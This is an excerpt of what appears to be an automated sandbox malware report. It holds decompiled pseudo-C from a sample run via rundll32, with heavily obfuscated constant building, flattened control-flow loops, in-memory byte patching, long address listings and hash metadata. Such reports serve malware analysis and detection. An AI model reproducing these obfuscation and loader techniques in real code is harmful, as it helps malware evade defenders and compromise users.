				_v196 = _v196 ^ 0x2c45e12b;
				_v196 = _v196 ^ 0xd3b3c009;
				_v204 = 0xadefc1;
				_v204 = _v204 >> 4;
				_v204 = _v204 | 0xb7bea7b8;
				_v204 = _v204 / _t506;
				_v204 = _v204 ^ 0x03274dc6;
				_v224 = 0x9d9cb1;
				_v224 = _v224 + 0xffffa27a;
				_v224 = _v224 + 0xffffee01;
				_v224 = _v224 + 0xffff764e;
				_v224 = _v224 ^ 0x0095b081;
				_v192 = 0x5eb987;
				_v192 = _v192 + 0xffff1159;
				_t507 = 0xe;
				_v192 = _v192 * 0x23;
				_v192 = _v192 + 0xffff653a;
				_v192 = _v192 ^ 0x0cdf46f4;
				_v104 = 0x141020;
				_v104 = _v104 << 6;
				_v104 = _v104 ^ 0x0502b476;
				_v168 = 0xc57d6d;
				_v168 = _v168 / _t507;
				_v168 = _v168 | 0x88578591;
				_v168 = _v168 ^ 0x8850307a;
				_v120 = 0x64bf72;
				_v120 = _v120 << 0xf;
				_v120 = _v120 ^ 0x5fbc8f9f;
				_v128 = 0xd63e1a;
				_v128 = _v128 + 0xffff0b7c;
				_v128 = _v128 ^ 0x00df6f35;
				_v136 = 0xd9491f;
				_v136 = _v136 + 0xffff8a09;
				_v136 = _v136 ^ 0x00d088a2;
				_v112 = 0xceb298;
				_v112 = _v112 + 0x36cc;
				_v112 = _v112 ^ 0x00c43f46;
				_v132 = 0x9f966b;
				_v132 = _v132 + 0xd61c;
				_v132 = _v132 ^ 0x00a3d2ff;
				_v216 = 0x70daad;
				_v216 = _v216 ^ 0xde964b68;
				_t508 = 0x3f;
				_v216 = _v216 * 0x49;
				_v216 = _v216 | 0xd3ab0205;
				_v216 = _v216 ^ 0xdfb04ca5;
				_v200 = 0xe4f811;
				_v200 = _v200 + 0xffffdd8f;
				_v200 = _v200 | 0x8a8b7b9c;
				_v200 = _v200 + 0xb2a2;
				_v200 = _v200 ^ 0x8af46931;
				_v244 = 0x65145a;
				_v244 = _v244 >> 4;
				_v244 = _v244 + 0x823b;
				_v244 = _v244 / _t508;
				_v244 = _v244 ^ 0x000ba257;
				_v184 = 0x53b52d;
				_v184 = _v184 >> 0xd;
				_v184 = _v184 | 0x3ab2fca7;
				_v184 = _v184 >> 0xa;
				_v184 = _v184 ^ 0x00013efe;
				_v176 = 0x3e1c9c;
				_v176 = _v176 * 0x3f;
				_v176 = _v176 * 0x61;
				_v176 = _v176 ^ 0xcaa54878;
				_v172 = 0xb8475b;
				_v172 = _v172 >> 2;
				_v172 = _v172 + 0xffff45a9;
				_v172 = _v172 ^ 0x002df2ce;
				_v148 = 0x11eadc;
				_v148 = _v148 * 0x2c;
				_v148 = _v148 ^ 0x0312b4e7;
				_v228 = 0xd45ea;
				_v228 = _v228 + 0x1c9a;
				_v228 = _v228 ^ 0x843ee8f1;
				_v228 = _v228 + 0xffff47b4;
				_v228 = _v228 ^ 0x843da11a;
				_v116 = 0x7a0457;
				_t509 = 0x4d;
				_v116 = _v116 / _t509;
				_v116 = _v116 ^ 0x00002c66;
				_v232 = 0x7f0d8a;
				_v232 = _v232 + 0xa3a9;
				_v232 = _v232 + 0xf9ff;
				_v232 = _v232 >> 1;
				_v232 = _v232 ^ 0x0040e313;
				_v208 = 0x135f21;
				_v208 = _v208 | 0x41f85818;
				_t510 = 0x60;
				_v208 = _v208 * 0x65;
				_v208 = _v208 << 0xe;
				_v208 = _v208 ^ 0x245ebba3;
				_v240 = 0x80e1e4;
				_v240 = _v240 + 0x9e19;
				_v240 = _v240 * 0x1d;
				_v240 = _v240 + 0xa9b2;
				_v240 = _v240 ^ 0x0eacf51a;
				_v100 = 0x156d59;
				_v100 = _v100 + 0x8f40;
				_v100 = _v100 ^ 0x001bd2c0;
				_v152 = 0x95953b;
				_v152 = _v152 >> 7;
				_v152 = _v152 / _t510;
				_v152 = _v152 ^ 0x000ebfd6;
				_v180 = 0x897e25;
				_v180 = _v180 | 0x70565201;
				_t511 = 0x75;
				_v180 = _v180 / _t511;
				_v180 = _v180 << 0xd;
				_v180 = _v180 ^ 0xdf07d45f;
				_v160 = 0x7982fe;
				_t512 = 0x32;
				_t513 = _v88;
				_v160 = _v160 / _t512;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x4dcbb71a;
				_v188 = 0x3ea9a3;
				_v188 = _v188 >> 2;
				_v188 = _v188 * 0x4a;
				_v188 = _v188 * 0x27;
				_v188 = _v188 ^ 0xb0903fbe;
				_v164 = 0x944a5b;
				_v164 = _v164 << 9;
				_v164 = _v164 * 0x65;
				_v164 = _v164 ^ 0x02abce10;
				_v156 = 0x59a8bb;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 + 0x17fc;
				_v156 = _v156 ^ 0x000023b1;
				goto L1;
				do {
					while(1) {
						L1:
						_t519 = _t448 - 0x5a88f65;
						if(_t519 > 0) {
							break;
						}
						if(_t519 == 0) {
							_t500 =  *_t446;
							E0035FA99(_v112, _v132, _v216, _v200, _t500);
							_t501 = _t500 + _v124;
							E0035FD29(_v84, _v244, _t501, _v184, _v80);
							_t502 = _t501 + _v80;
							_push(_v148);
							_push(_v172);
							_push(_t513);
							E00345894(_t502, _v176);
							_t493 =  &(_t502[_t513]);
							_t515 = _t515 + 0x24;
							_t458 = _t502;
							if(_t502 >= _t493) {
								L15:
								_t432 = E0034EF71(0, 0xe);
								_t448 = 0x44ef61d;
								 *((char*)(_t432 + _t502)) = 0;
								_t499 = _v92;
								continue;
							} else {
								goto L12;
							}
							do {
								L12:
								if(( *_t458 & 0x000000ff) == _v236) {
									 *_t458 = 0xc3;
								}
								_t458 =  &(_t458[1]);
							} while (_t458 < _t493);
							goto L15;
						}
						if(_t448 == 0xb503f3) {
							_t448 = 0xf32de15;
							continue;
						}
						if(_t448 == 0x231aa40) {
							_t435 = E003545CD(_v192,  &_v76,  &_v84);
							asm("sbb ecx, ecx");
							_t448 = ( ~_t435 & 0xfac85eed) + 0xa894c28;
							continue;
						}
						if(_t448 == 0x44ef61d) {
							E003468DE(_v232, _v208, _v240, _v100, _v84);
							_t515 = _t515 + 0xc;
							_t448 = 0xa894c28;
							continue;
						}
						if(_t448 != 0x551ab15) {
							goto L28;
						}
						_t513 = E0034EF71(_v164, _v156);
						_t448 = 0xb847f8c;
						 *((intOrPtr*)(_t446 + 4)) = _v140 + _v80 + _t513;
					}
					if(_t448 == 0xa894c28) {
						E003468DE(_v152, _v180, _v160, _v188, _v76);
						_t515 = _t515 + 0xc;
						_t448 = 0x47d0478;
						goto L28;
					}
					if(_t448 == 0xb847f8c) {
						_push(_t448);
						_push(_t448);
						_t419 = E00353512( *((intOrPtr*)(_t446 + 4)));
						 *_t446 = _t419;
						if(_t419 == 0) {
							_t448 = 0x44ef61d;
						} else {
							_t448 = 0x5a88f65;
							_t499 = 1;
							_v92 = 1;
						}
						goto L1;
					}
					if(_t448 == 0xe73b6d2) {
						_v48 = _v88;
						_v52 = 0x20;
						_v56 =  &_v32;
						_v64 =  *_t498;
						_v60 =  *((intOrPtr*)(_t498 + 4));
						_t424 = E0035FF31( &_v76,  &_v68, _v144, _v196, _v204);
						_t515 = _t515 + 0xc;
						if(_t424 == 0) {
							break;
						}
						_t448 = 0x231aa40;
						goto L1;
					}
					if(_t448 != 0xf32de15) {
						goto L28;
					}
					_push( *_t498);
					_t444 = E00351831(_v212, _v220,  &_v32, _v96, _t448,  *((intOrPtr*)(_t498 + 4)));
					_t515 = _t515 + 0x18;
					if(_t444 == 0) {
						break;
					}
					_t448 = 0xe73b6d2;
					goto L1;
					L28:
				} while (_t448 != 0x47d0478);
				return _t499;
			}
















































































                                                                                                                      0x00341fa5
                                                                                                                      0x00341fac
                                                                                                                      0x00341fae
                                                                                                                      0x00341faf
                                                                                                                      0x00341fb8
                                                                                                                      0x00341fbf
                                                                                                                      0x00341fc6
                                                                                                                      0x00341fcd
                                                                                                                      0x00341fd4
                                                                                                                      0x00341fd5
                                                                                                                      0x00341fd6
                                                                                                                      0x00341fdb
                                                                                                                      0x00341fe3
                                                                                                                      0x00341fe6
                                                                                                                      0x00341ff0
                                                                                                                      0x00341ff8
                                                                                                                      0x00341ffa
                                                                                                                      0x00341ffe
                                                                                                                      0x00342003
                                                                                                                      0x0034200b
                                                                                                                      0x00342013
                                                                                                                      0x0034201b
                                                                                                                      0x00342023
                                                                                                                      0x00342037
                                                                                                                      0x0034203c
                                                                                                                      0x00342045
                                                                                                                      0x00342050
                                                                                                                      0x00342063
                                                                                                                      0x00342066
                                                                                                                      0x0034206d
                                                                                                                      0x00342074
                                                                                                                      0x0034207f
                                                                                                                      0x00342087
                                                                                                                      0x00342097
                                                                                                                      0x0034209b
                                                                                                                      0x003420a3
                                                                                                                      0x003420ab
                                                                                                                      0x003420b8
                                                                                                                      0x003420b9
                                                                                                                      0x003420c2
                                                                                                                      0x003420c6
                                                                                                                      0x003420cb
                                                                                                                      0x003420d3
                                                                                                                      0x003420e6
                                                                                                                      0x003420ed
                                                                                                                      0x003420f8
                                                                                                                      0x00342100
                                                                                                                      0x00342108
                                                                                                                      0x00342110
                                                                                                                      0x00342118
                                                                                                                      0x0034211d
                                                                                                                      0x00342125
                                                                                                                      0x0034212d
                                                                                                                      0x00342135
                                                                                                                      0x0034213d
                                                                                                                      0x00342142
                                                                                                                      0x00342150
                                                                                                                      0x00342154
                                                                                                                      0x0034215c
                                                                                                                      0x00342164
                                                                                                                      0x0034216c
                                                                                                                      0x00342176
                                                                                                                      0x0034217e
                                                                                                                      0x00342186
                                                                                                                      0x0034218e
                                                                                                                      0x0034219d
                                                                                                                      0x003421a0
                                                                                                                      0x003421a4
                                                                                                                      0x003421ac
                                                                                                                      0x003421b4
                                                                                                                      0x003421bf
                                                                                                                      0x003421c7
                                                                                                                      0x003421d2
                                                                                                                      0x003421e2
                                                                                                                      0x003421e6
                                                                                                                      0x003421ee
                                                                                                                      0x003421f6
                                                                                                                      0x00342201
                                                                                                                      0x00342209
                                                                                                                      0x00342214
                                                                                                                      0x0034221f
                                                                                                                      0x0034222a
                                                                                                                      0x00342235
                                                                                                                      0x00342240
                                                                                                                      0x0034224b
                                                                                                                      0x00342256
                                                                                                                      0x00342261
                                                                                                                      0x0034226c
                                                                                                                      0x00342277
                                                                                                                      0x00342282
                                                                                                                      0x0034228d
                                                                                                                      0x00342298
                                                                                                                      0x003422a0
                                                                                                                      0x003422ad
                                                                                                                      0x003422ae
                                                                                                                      0x003422b2
                                                                                                                      0x003422ba
                                                                                                                      0x003422c2
                                                                                                                      0x003422ca
                                                                                                                      0x003422d2
                                                                                                                      0x003422da
                                                                                                                      0x003422e2
                                                                                                                      0x003422ea
                                                                                                                      0x003422f2
                                                                                                                      0x003422f7
                                                                                                                      0x00342305
                                                                                                                      0x00342309
                                                                                                                      0x00342311
                                                                                                                      0x00342319
                                                                                                                      0x0034231e
                                                                                                                      0x00342326
                                                                                                                      0x0034232b
                                                                                                                      0x00342333
                                                                                                                      0x00342340
                                                                                                                      0x00342349
                                                                                                                      0x0034234d
                                                                                                                      0x00342355
                                                                                                                      0x0034235d
                                                                                                                      0x00342362
                                                                                                                      0x0034236a
                                                                                                                      0x00342372
                                                                                                                      0x0034237f
                                                                                                                      0x00342383
                                                                                                                      0x0034238b
                                                                                                                      0x00342393
                                                                                                                      0x0034239b
                                                                                                                      0x003423a3
                                                                                                                      0x003423ab
                                                                                                                      0x003423b3
                                                                                                                      0x003423c9
                                                                                                                      0x003423ce
                                                                                                                      0x003423d7
                                                                                                                      0x003423e2
                                                                                                                      0x003423ea
                                                                                                                      0x003423f2
                                                                                                                      0x003423fa
                                                                                                                      0x003423fe
                                                                                                                      0x00342406
                                                                                                                      0x0034240e
                                                                                                                      0x0034241b
                                                                                                                      0x0034241e
                                                                                                                      0x00342422
                                                                                                                      0x00342427
                                                                                                                      0x0034242f
                                                                                                                      0x00342437
                                                                                                                      0x00342444
                                                                                                                      0x00342448
                                                                                                                      0x00342450
                                                                                                                      0x00342458
                                                                                                                      0x00342463
                                                                                                                      0x0034246e
                                                                                                                      0x00342479
                                                                                                                      0x00342481
                                                                                                                      0x0034248e
                                                                                                                      0x00342492
                                                                                                                      0x0034249a
                                                                                                                      0x003424a2
                                                                                                                      0x003424ae
                                                                                                                      0x003424b3
                                                                                                                      0x003424b9
                                                                                                                      0x003424be
                                                                                                                      0x003424c6
                                                                                                                      0x003424d2
                                                                                                                      0x003424d5
                                                                                                                      0x003424dc
                                                                                                                      0x003424e0
                                                                                                                      0x003424e5
                                                                                                                      0x003424ed
                                                                                                                      0x003424f5
                                                                                                                      0x003424ff
                                                                                                                      0x00342508
                                                                                                                      0x0034250c
                                                                                                                      0x00342514
                                                                                                                      0x0034251c
                                                                                                                      0x00342526
                                                                                                                      0x0034252a
                                                                                                                      0x00342532
                                                                                                                      0x0034253a
                                                                                                                      0x0034253f
                                                                                                                      0x00342547
                                                                                                                      0x00342547
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x0034254f
                                                                                                                      0x00342555
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034255b
                                                                                                                      0x0034262b
                                                                                                                      0x00342644
                                                                                                                      0x00342653
                                                                                                                      0x0034266c
                                                                                                                      0x00342671
                                                                                                                      0x0034267d
                                                                                                                      0x00342681
                                                                                                                      0x00342689
                                                                                                                      0x0034268a
                                                                                                                      0x0034268f
                                                                                                                      0x00342692
                                                                                                                      0x00342695
                                                                                                                      0x00342699
                                                                                                                      0x003426ac
                                                                                                                      0x003426bb
                                                                                                                      0x003426c2
                                                                                                                      0x003426c7
                                                                                                                      0x003426cb
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0034269b
                                                                                                                      0x0034269b
                                                                                                                      0x003426a2
                                                                                                                      0x003426a4
                                                                                                                      0x003426a4
                                                                                                                      0x003426a7
                                                                                                                      0x003426a8
                                                                                                                      0x00000000
                                                                                                                      0x0034269b
                                                                                                                      0x00342567
                                                                                                                      0x00342621
                                                                                                                      0x00000000
                                                                                                                      0x00342621
                                                                                                                      0x00342573
                                                                                                                      0x00342603
                                                                                                                      0x0034260e
                                                                                                                      0x00342616
                                                                                                                      0x00000000
                                                                                                                      0x00342616
                                                                                                                      0x0034257b
                                                                                                                      0x003425d9
                                                                                                                      0x003425de
                                                                                                                      0x003425e1
                                                                                                                      0x00000000
                                                                                                                      0x003425e1
                                                                                                                      0x00342583
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003425a1
                                                                                                                      0x003425b5
                                                                                                                      0x003425ba
                                                                                                                      0x003425ba
                                                                                                                      0x003426dd
                                                                                                                      0x0034280a
                                                                                                                      0x0034280f
                                                                                                                      0x00342812
                                                                                                                      0x00000000
                                                                                                                      0x00342812
                                                                                                                      0x003426e9
                                                                                                                      0x003427c3
                                                                                                                      0x003427c4
                                                                                                                      0x003427c8
                                                                                                                      0x003427cd
                                                                                                                      0x003427d3
                                                                                                                      0x003427e9
                                                                                                                      0x003427d5
                                                                                                                      0x003427d7
                                                                                                                      0x003427dc
                                                                                                                      0x003427dd
                                                                                                                      0x003427dd
                                                                                                                      0x00000000
                                                                                                                      0x003427d3
                                                                                                                      0x003426f5
                                                                                                                      0x00342757
                                                                                                                      0x00342773
                                                                                                                      0x0034277e
                                                                                                                      0x00342787
                                                                                                                      0x00342791
                                                                                                                      0x00342798
                                                                                                                      0x0034279d
                                                                                                                      0x003427a2
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003427a4
                                                                                                                      0x00000000
                                                                                                                      0x003427a4
                                                                                                                      0x003426fd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342703
                                                                                                                      0x00342727
                                                                                                                      0x0034272c
                                                                                                                      0x00342731
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342737
                                                                                                                      0x00000000
                                                                                                                      0x00342817
                                                                                                                      0x00342817
                                                                                                                      0x0034282f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $+E,$f,$E
                                                                                                                      • API String ID: 0-1056989491
                                                                                                                      • Opcode ID: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction ID: a80c6eee7baa11cb4b0c361aa91747c44c6535b2f21172593d41a70e89feebff
                                                                                                                      • Opcode Fuzzy Hash: f924d05836e70ef0a09e8ac1d4695ea004385d1c302f03348df483147d80d69e
                                                                                                                      • Instruction Fuzzy Hash: CB224F715083808FD369CF26C58AA5BFBE1FBC5708F50891DF6998A260D7B1A949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035CC89 Relevance: 5.3, Strings: 4, Instructions: 287COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0035CC89(intOrPtr* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* __ecx;
				void* _t283;
				intOrPtr _t315;
				void* _t316;
				intOrPtr _t320;
				intOrPtr _t324;
				void* _t325;
				intOrPtr* _t328;
				void* _t330;
				void* _t365;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				signed int _t371;
				signed int _t372;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int* _t381;

				_t367 = _a4;
				_t328 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0034CF25(_t283);
				_v60 = 0x688185;
				_t381 =  &(( &_v116)[4]);
				_v60 = _v60 ^ 0x6a5ee641;
				_t6 =  &_v60; // 0x6a5ee641
				_t365 = 0;
				_t330 = 0xb7d839b;
				_t368 = 0x77;
				_v60 =  *_t6 * 0x53;
				_v60 = _v60 ^ 0x6fa3a48d;
				_v36 = 0x2ce9a9;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x0000609f;
				_v72 = 0x8d05d4;
				_v72 = _v72 + 0xfffff9ae;
				_v72 = _v72 + 0xfffffb99;
				_v72 = _v72 + 0xffff1821;
				_v72 = _v72 ^ 0x008c133c;
				_v84 = 0xdf93a7;
				_v84 = _v84 + 0x158a;
				_v84 = _v84 | 0xa6edaf65;
				_v84 = _v84 ^ 0xa6ffaf75;
				_v16 = 0x181fb2;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x00000303;
				_v40 = 0xf7fe46;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0x000f7fe4;
				_v96 = 0x7307ab;
				_v96 = _v96 + 0xffff98a0;
				_v96 = _v96 ^ 0x207b23a6;
				_t369 = 7;
				_v96 = _v96 / _t369;
				_v96 = _v96 ^ 0x0493a521;
				_v68 = 0xb0f7c2;
				_v68 = _v68 + 0xa001;
				_v68 = _v68 + 0xf927;
				_t370 = 0x1b;
				_v68 = _v68 / _t370;
				_v68 = _v68 ^ 0x0001298b;
				_v20 = 0x9a8fe8;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0008eae3;
				_v76 = 0xc447f;
				_v76 = _v76 << 2;
				_v76 = _v76 ^ 0x6da7c905;
				_v76 = _v76 | 0x8e440162;
				_v76 = _v76 ^ 0xefde5c32;
				_v80 = 0xe5293a;
				_v80 = _v80 ^ 0x7ea2fbd4;
				_v80 = _v80 << 6;
				_v80 = _v80 >> 0x10;
				_v80 = _v80 ^ 0x000bb464;
				_v24 = 0xaea513;
				_v24 = _v24 ^ 0xb7e1a43c;
				_v24 = _v24 ^ 0xb74b462d;
				_v28 = 0x6b2191;
				_v28 = _v28 | 0x9c0eb3e2;
				_v28 = _v28 ^ 0x9c639c10;
				_v32 = 0x4e8823;
				_t371 = 0xe;
				_v32 = _v32 / _t371;
				_v32 = _v32 ^ 0x000823cf;
				_v88 = 0x8b37c7;
				_v88 = _v88 + 0x96e4;
				_t372 = 0x63;
				_v88 = _v88 / _t372;
				_t373 = 0x18;
				_v88 = _v88 / _t373;
				_v88 = _v88 ^ 0x000cd8d0;
				_v92 = 0x8ccaf;
				_v92 = _v92 + 0xffff7c77;
				_v92 = _v92 >> 7;
				_t374 = 0x1a;
				_v92 = _v92 * 0x4a;
				_v92 = _v92 ^ 0x000ee576;
				_v100 = 0x6d8220;
				_v100 = _v100 + 0xffffba59;
				_v100 = _v100 / _t374;
				_v100 = _v100 + 0x20d5;
				_v100 = _v100 ^ 0x000e9a10;
				_v104 = 0xccaba6;
				_t375 = 0x29;
				_v104 = _v104 / _t375;
				_t376 = 0x69;
				_v104 = _v104 / _t376;
				_v104 = _v104 + 0xffff1a57;
				_v104 = _v104 ^ 0xfff2229f;
				_v44 = 0x73a08b;
				_v44 = _v44 / _t376;
				_v44 = _v44 ^ 0x0004e5c5;
				_v108 = 0xb1e3bd;
				_v108 = _v108 ^ 0x0f8130c9;
				_v108 = _v108 + 0x5ac4;
				_t377 = 0x21;
				_v108 = _v108 / _t377;
				_v108 = _v108 ^ 0x0077ef5a;
				_v112 = 0x4cec76;
				_t192 =  &_v112; // 0x4cec76
				_v112 =  *_t192 * 0x1a;
				_v112 = _v112 + 0xdd93;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0xf432eb29;
				_v116 = 0x879801;
				_v116 = _v116 + 0x9229;
				_v116 = _v116 << 3;
				_v116 = _v116 | 0xee96daec;
				_v116 = _v116 ^ 0xeed13984;
				_v64 = 0x9b79ce;
				_v64 = _v64 >> 0xe;
				_t378 = 0x5f;
				_v64 = _v64 * 0x1e;
				_v64 = _v64 | 0xf7dc9e8a;
				_v64 = _v64 ^ 0xf7d2a70d;
				_v48 = 0x898fb;
				_v48 = _v48 << 0xa;
				_v48 = _v48 * 0x4f;
				_v48 = _v48 ^ 0x9cd9bf24;
				_v52 = 0xd43737;
				_v52 = _v52 << 9;
				_v52 = _v52 / _t378;
				_v52 = _v52 ^ 0x01c68cd1;
				_v56 = 0x1c405f;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 | 0xb1ef7bec;
				_v56 = _v56 ^ 0xb1edddf2;
				do {
					while(_t330 != 0x6ea4fc1) {
						if(_t330 == 0x7f0f713) {
							_push(_t330);
							_push(_t330);
							_t320 = E00353512(_v8);
							_v12 = _t320;
							if(_t320 != 0) {
								_t330 = 0xa80f622;
								continue;
							}
						} else {
							if(_t330 == 0x7f61550) {
								E003468DE(_v64, _v48, _v52, _v56, _v12);
							} else {
								if(_t330 == 0xa80f622) {
									_t324 =  *0x365c9c; // 0x0
									_t325 = E0034B335(_v100,  *_t367, _v104,  *((intOrPtr*)(_t324 + 0x50)), _v36, _t330, _v40,  &_v8, _v44,  *((intOrPtr*)(_t367 + 4)), _v108, _v112, _v12, _v116, _t330, _v8);
									_t381 =  &(_t381[0xe]);
									if(_t325 == _v96) {
										 *_t328 = _v12;
										_t365 = 1;
										 *((intOrPtr*)(_t328 + 4)) = _v8;
									} else {
										_t330 = 0x7f61550;
										continue;
									}
								} else {
									if(_t330 != 0xb7d839b) {
										goto L14;
									} else {
										_t330 = 0x6ea4fc1;
										continue;
									}
								}
							}
						}
						L18:
						return _t365;
					}
					_t315 =  *0x365c9c; // 0x0
					_t316 = E0034B335(_v68,  *_t367, _v20,  *((intOrPtr*)(_t315 + 0x50)), _v60, _t330, _v72,  &_v8, _v76,  *((intOrPtr*)(_t367 + 4)), _v80, _v24, _t365, _v28, _t330, _v84);
					_t381 =  &(_t381[0xe]);
					if(_t316 != _v16) {
						_t330 = 0x33d9eeb;
						goto L14;
					} else {
						_t330 = 0x7f0f713;
						continue;
					}
					goto L18;
					L14:
				} while (_t330 != 0x33d9eeb);
				goto L18;
			}





















































                                                                                                                      0x0035cc8f
                                                                                                                      0x0035cc96
                                                                                                                      0x0035cc99
                                                                                                                      0x0035cca0
                                                                                                                      0x0035cca1
                                                                                                                      0x0035cca3
                                                                                                                      0x0035cca8
                                                                                                                      0x0035ccb0
                                                                                                                      0x0035ccb3
                                                                                                                      0x0035ccbd
                                                                                                                      0x0035ccc2
                                                                                                                      0x0035ccc4
                                                                                                                      0x0035cccb
                                                                                                                      0x0035ccce
                                                                                                                      0x0035ccd2
                                                                                                                      0x0035ccda
                                                                                                                      0x0035ccea
                                                                                                                      0x0035ccee
                                                                                                                      0x0035ccf6
                                                                                                                      0x0035ccfe
                                                                                                                      0x0035cd06
                                                                                                                      0x0035cd0e
                                                                                                                      0x0035cd16
                                                                                                                      0x0035cd1e
                                                                                                                      0x0035cd26
                                                                                                                      0x0035cd2e
                                                                                                                      0x0035cd36
                                                                                                                      0x0035cd3e
                                                                                                                      0x0035cd46
                                                                                                                      0x0035cd4b
                                                                                                                      0x0035cd53
                                                                                                                      0x0035cd5b
                                                                                                                      0x0035cd60
                                                                                                                      0x0035cd68
                                                                                                                      0x0035cd70
                                                                                                                      0x0035cd78
                                                                                                                      0x0035cd84
                                                                                                                      0x0035cd89
                                                                                                                      0x0035cd8f
                                                                                                                      0x0035cd97
                                                                                                                      0x0035cd9f
                                                                                                                      0x0035cda7
                                                                                                                      0x0035cdb3
                                                                                                                      0x0035cdb6
                                                                                                                      0x0035cdba
                                                                                                                      0x0035cdc2
                                                                                                                      0x0035cdca
                                                                                                                      0x0035cdcf
                                                                                                                      0x0035cdd7
                                                                                                                      0x0035cddf
                                                                                                                      0x0035cde4
                                                                                                                      0x0035cdec
                                                                                                                      0x0035cdf4
                                                                                                                      0x0035cdfc
                                                                                                                      0x0035ce04
                                                                                                                      0x0035ce0c
                                                                                                                      0x0035ce11
                                                                                                                      0x0035ce16
                                                                                                                      0x0035ce1e
                                                                                                                      0x0035ce26
                                                                                                                      0x0035ce2e
                                                                                                                      0x0035ce36
                                                                                                                      0x0035ce3e
                                                                                                                      0x0035ce46
                                                                                                                      0x0035ce4e
                                                                                                                      0x0035ce5e
                                                                                                                      0x0035ce63
                                                                                                                      0x0035ce67
                                                                                                                      0x0035ce6f
                                                                                                                      0x0035ce77
                                                                                                                      0x0035ce85
                                                                                                                      0x0035ce8a
                                                                                                                      0x0035ce94
                                                                                                                      0x0035ce99
                                                                                                                      0x0035ce9d
                                                                                                                      0x0035cea5
                                                                                                                      0x0035cead
                                                                                                                      0x0035ceb5
                                                                                                                      0x0035cec1
                                                                                                                      0x0035cec4
                                                                                                                      0x0035cec8
                                                                                                                      0x0035ced0
                                                                                                                      0x0035ced8
                                                                                                                      0x0035cee8
                                                                                                                      0x0035ceec
                                                                                                                      0x0035cef4
                                                                                                                      0x0035cefc
                                                                                                                      0x0035cf08
                                                                                                                      0x0035cf0d
                                                                                                                      0x0035cf17
                                                                                                                      0x0035cf1c
                                                                                                                      0x0035cf20
                                                                                                                      0x0035cf28
                                                                                                                      0x0035cf30
                                                                                                                      0x0035cf40
                                                                                                                      0x0035cf46
                                                                                                                      0x0035cf4e
                                                                                                                      0x0035cf56
                                                                                                                      0x0035cf5e
                                                                                                                      0x0035cf6a
                                                                                                                      0x0035cf6d
                                                                                                                      0x0035cf71
                                                                                                                      0x0035cf79
                                                                                                                      0x0035cf81
                                                                                                                      0x0035cf86
                                                                                                                      0x0035cf8a
                                                                                                                      0x0035cf92
                                                                                                                      0x0035cf97
                                                                                                                      0x0035cf9f
                                                                                                                      0x0035cfa7
                                                                                                                      0x0035cfaf
                                                                                                                      0x0035cfb4
                                                                                                                      0x0035cfbc
                                                                                                                      0x0035cfc4
                                                                                                                      0x0035cfce
                                                                                                                      0x0035cfda
                                                                                                                      0x0035cfdb
                                                                                                                      0x0035cfdf
                                                                                                                      0x0035cfe7
                                                                                                                      0x0035cfef
                                                                                                                      0x0035cff7
                                                                                                                      0x0035d001
                                                                                                                      0x0035d005
                                                                                                                      0x0035d00d
                                                                                                                      0x0035d015
                                                                                                                      0x0035d025
                                                                                                                      0x0035d029
                                                                                                                      0x0035d031
                                                                                                                      0x0035d039
                                                                                                                      0x0035d03e
                                                                                                                      0x0035d046
                                                                                                                      0x0035d04e
                                                                                                                      0x0035d04e
                                                                                                                      0x0035d05c
                                                                                                                      0x0035d0f6
                                                                                                                      0x0035d0f7
                                                                                                                      0x0035d0ff
                                                                                                                      0x0035d104
                                                                                                                      0x0035d10f
                                                                                                                      0x0035d115
                                                                                                                      0x00000000
                                                                                                                      0x0035d115
                                                                                                                      0x0035d062
                                                                                                                      0x0035d068
                                                                                                                      0x0035d1af
                                                                                                                      0x0035d06e
                                                                                                                      0x0035d074
                                                                                                                      0x0035d0bc
                                                                                                                      0x0035d0ce
                                                                                                                      0x0035d0d3
                                                                                                                      0x0035d0da
                                                                                                                      0x0035d18f
                                                                                                                      0x0035d191
